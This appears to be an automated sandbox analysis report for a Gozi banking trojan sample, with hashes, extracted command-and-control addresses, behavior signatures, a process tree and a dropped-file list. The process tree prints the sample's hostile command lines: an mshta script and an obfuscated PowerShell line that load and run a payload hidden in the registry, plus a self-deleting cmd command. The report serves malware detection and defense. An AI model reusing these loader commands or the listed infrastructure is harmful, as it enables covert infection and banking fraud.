gozi | 5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 11:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

294KB
MD5

bb35f8c1a3236ad31c754cdfe795d57f
SHA1

b744f8ae31e2b3f7c3b72b9615823a3a3ad02989
SHA256

5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2
SHA512

fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0
SSDEEP

3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2288 set thread context of 1208	2288	powershell.exe	Explorer.EXE
PID 1208 set thread context of 2072	1208	Explorer.EXE	cmd.exe
PID 2072 set thread context of 1728	2072	cmd.exe	PING.EXE
PID 1208 set thread context of 2820	1208	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1728 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1728 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1728	PING.EXE

pid	process
1728	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1740	client.exe
2288	powershell.exe
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2288 powershell.exe
1208 Explorer.EXE
2072 cmd.exe
1208 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2288 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1208 Explorer.EXE

pid	process
2288	powershell.exe
1208	Explorer.EXE
2072	cmd.exe
1208	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2288	powershell.exe

pid	process
1208	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2540 wrote to memory of 2288	2540	mshta.exe	powershell.exe
PID 2540 wrote to memory of 2288	2540	mshta.exe	powershell.exe
PID 2540 wrote to memory of 2288	2540	mshta.exe	powershell.exe
PID 2288 wrote to memory of 2120	2288	powershell.exe	csc.exe
PID 2288 wrote to memory of 2120	2288	powershell.exe	csc.exe
PID 2288 wrote to memory of 2120	2288	powershell.exe	csc.exe
PID 2120 wrote to memory of 2356	2120	csc.exe	cvtres.exe
PID 2120 wrote to memory of 2356	2120	csc.exe	cvtres.exe
PID 2120 wrote to memory of 2356	2120	csc.exe	cvtres.exe
PID 2288 wrote to memory of 1940	2288	powershell.exe	csc.exe
PID 2288 wrote to memory of 1940	2288	powershell.exe	csc.exe
PID 2288 wrote to memory of 1940	2288	powershell.exe	csc.exe
PID 1940 wrote to memory of 1644	1940	csc.exe	cvtres.exe
PID 1940 wrote to memory of 1644	1940	csc.exe	cvtres.exe
PID 1940 wrote to memory of 1644	1940	csc.exe	cvtres.exe
PID 2288 wrote to memory of 1208	2288	powershell.exe	Explorer.EXE
PID 2288 wrote to memory of 1208	2288	powershell.exe	Explorer.EXE
PID 2288 wrote to memory of 1208	2288	powershell.exe	Explorer.EXE
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2072	1208	Explorer.EXE	cmd.exe
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 2072 wrote to memory of 1728	2072	cmd.exe	PING.EXE
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe
PID 1208 wrote to memory of 2820	1208	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1208

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1740

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nad1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nad1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3C64491B-6BF2-CEE4-D530-CFE2D9647336\\\MusicWhite'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name utsmlt -value gp; new-alias -name rrpjpp -value iex; rrpjpp ([System.Text.Encoding]::ASCII.GetString((utsmlt "HKCU:Software\AppDataLow\Software\Microsoft\3C64491B-6BF2-CEE4-D530-CFE2D9647336").ControlText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3xibae0p.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB626.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp"
5⤵
PID:2356

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmgnln8o.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6C2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB6C1.tmp"
5⤵
PID:1644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1728

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3xibae0p.dll

Filesize
3KB

MD5
8577d3e0590c88bfc056dbde543f6a60

SHA1
56144cd701ff81971c7a4e7bed95df69bdee9aec

SHA256
34afea1868e15fb49ed22765679bd05e1b264a450e7c5e5d475443ad1011b87d

SHA512
5292b0eab8b1e89721836f781b024aca8a97f91c955948c4590d4a655af95eca3c893b5676544f992e89bcb969d1644f4ed3cb5f98f0638449e392b3ea386d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\3xibae0p.pdb

Filesize
7KB

MD5
f9b91ece51d05c69a89d0dba099508e1

SHA1
4105a1c5e5729bcbf2cbcb98f565987bab4b0917

SHA256
9c7051cbb3a78e0cfc8df6c09ee93d231bf7987cae1ed985189ec42a32cf4156

SHA512
325d25d5ea686589dcb956645c740a4de47826cc1cad85746b31e0e14163796673d06fd50ed8061ec0a78308984728e68ce476e8ef20667d70e69d22909c54b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB626.tmp

Filesize
1KB

MD5
8dd2743f86bf6d0e898352abcf61f5c7

SHA1
ef64f2595e92ce8b5c3296db64a72e0cd017e5bf

SHA256
3b731c51db0b516d57606957a3b9be56ad50233d361ced8adf2d53bb2566f2e7

SHA512
f885c2e5178930b904d952e498a479d3f697005ce5537782ef517e79bcc2d7dd48ff879d39f281d800516547dc2b0a34cb5d6cf45a0bd1fab11fa7c324c419f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB6C2.tmp

Filesize
1KB

MD5
b88751cfb26bda4439ac8543d56061e9

SHA1
5efa743c2cd8b7bd61c7f95de023ff44d612024a

SHA256
e39add0e7052d96c9c3abae627745778b2804ad85e4753a517265b5898de68dc

SHA512
a1c985c8b1adcd77a59cb5220c5d5345371dae93bbcdc587792d39f64f97211a477a3d09b97d3f1314feb9c4ee8396037364444bb6b65a11491f7a7bd0806be6

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmgnln8o.dll

Filesize
3KB

MD5
c23327c51c28eb6c3fc71a3a8e8aefea

SHA1
52f693f188a6ae6a7a98f249d43f0dffa5a3f5b2

SHA256
75a20e71bc3976c13fef7ffeb21324dc20859862485c32537a6ab7b48d813425

SHA512
4a4bc8d24bff7300aa2d75d7addccecd01846cab9bf1d0d3e4e71835ebef7da6e33ba374476036877245e0073eefcb7deb16f13a4552a33c1957b875d6056014

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmgnln8o.pdb

Filesize
7KB

MD5
f69604f6f4ed76d5517459fde16473ea

SHA1
c08d00e855b33e67b8e706767b84adeee5a86981

SHA256
519da26f1ed58dac098778076e2c5f138749fd2e6a784f370fa41e612308a0aa

SHA512
6d75795ae141250e949183ae9c7b0c7659b79a1cc3649867d82c58cdf52cbb0f6ef89cb71581a22fd846762f7173d37c292d01b7b1f796d81506beeb19d70cea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3xibae0p.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3xibae0p.cmdline

Filesize
309B

MD5
abd1ed2b930c909242676d404c12b994

SHA1
43e5ce622621f8012b54e1312069fef50e2aaec6

SHA256
25251875c4729c84c5794a1474b047aff36756a2b88e51be44de482dd0dfd21f

SHA512
5a2a655e2760004007348030272cbab8c82457b2c623f7577845d1bc5137b1b3fbced83537efb9aec4acd25766d3ad0e630c612ceeb583821a58a6c99c08aeef

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp

Filesize
652B

MD5
6613399779b463f0b52d4b7a5ad93a96

SHA1
eaf3cad4078cfbe23b5b3a8cdf7a66729e6c95b3

SHA256
2c7981c9479e498ab6a1bd665380708d584033a021bb5277c22afb9d0705a82c

SHA512
e48f89ff4eb5b3150c8c0eb6b806d95af4529b0e954153a631253847ed73a7b5566cdf678ee0d3e8e009e819a0772eef074cc623a18d23a6edf163fe79ecd1c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB6C1.tmp

Filesize
652B

MD5
86714b169fe0cf6e5f5e607424bf7530

SHA1
c7a68d4e5a1919901545a174a2ecbdf931e983ef

SHA256
fc99027ca9c026cb970ca82603d3d16bed21db6d4200e59f5acfa34e9e490535

SHA512
9f5727549cd03f506057f846003457309690e851512ab540238b0860ead195ab6798fa77f4e6383f1ab1038ba3b1f5e157356296e55ffa45c2d44bf934ea0716

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmgnln8o.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmgnln8o.cmdline

Filesize
309B

MD5
4c3d4af71f1d15bd9749390bdbc4030c

SHA1
ca9994d512f026c73aaeb491cb99506bf572040f

SHA256
a577c664ea719b3ec420398aaf3562b21cf82f9411a90d5ac29e55a3cc4c8509

SHA512
2bcf92b8239e88e176de498624264ffaf632463a0cdefe3afc7b4293f96dd18ae3c213f16c1eb9db8d70f0c09ee2edf5115b34a6f7d13861331ceb1623cb1d33

Download Submit
memory/1208-68-0x0000000006A30000-0x0000000006AD4000-memory.dmp

Filesize
656KB

Download
memory/1208-69-0x0000000002170000-0x0000000002171000-memory.dmp

Filesize
4KB

Download
memory/1728-87-0x0000000001BC0000-0x0000000001C64000-memory.dmp

Filesize
656KB

Download
memory/1728-88-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1728-86-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1740-22-0x00000000047F0000-0x00000000047F2000-memory.dmp

Filesize
8KB

Download
memory/1740-1-0x0000000000290000-0x0000000000390000-memory.dmp

Filesize
1024KB

Download
memory/1740-9-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1740-8-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download
memory/1740-7-0x0000000000290000-0x0000000000390000-memory.dmp

Filesize
1024KB

Download
memory/1740-4-0x00000000001D0000-0x00000000001DD000-memory.dmp

Filesize
52KB

Download
memory/1740-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1740-2-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download
memory/2072-79-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmp

Filesize
4KB

Download
memory/2072-80-0x0000000001C00000-0x0000000001CA4000-memory.dmp

Filesize
656KB

Download
memory/2072-81-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/2288-31-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/2288-67-0x0000000002620000-0x000000000265D000-memory.dmp

Filesize
244KB

Download
memory/2288-64-0x0000000002590000-0x0000000002598000-memory.dmp

Filesize
32KB

Download
memory/2288-48-0x0000000002580000-0x0000000002588000-memory.dmp

Filesize
32KB

Download
memory/2288-77-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-78-0x0000000002620000-0x000000000265D000-memory.dmp

Filesize
244KB

Download
memory/2288-34-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/2288-33-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/2288-32-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-30-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-29-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2288-28-0x000000001B370000-0x000000001B652000-memory.dmp

Filesize
2.9MB

Download
memory/2820-92-0x0000000001BC0000-0x0000000001C58000-memory.dmp

Filesize
608KB

Download
memory/2820-95-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/2820-96-0x0000000001BC0000-0x0000000001C58000-memory.dmp

Filesize
608KB

Download
memory/2820-97-0x0000000001BC0000-0x0000000001C58000-memory.dmp

Filesize
608KB

Download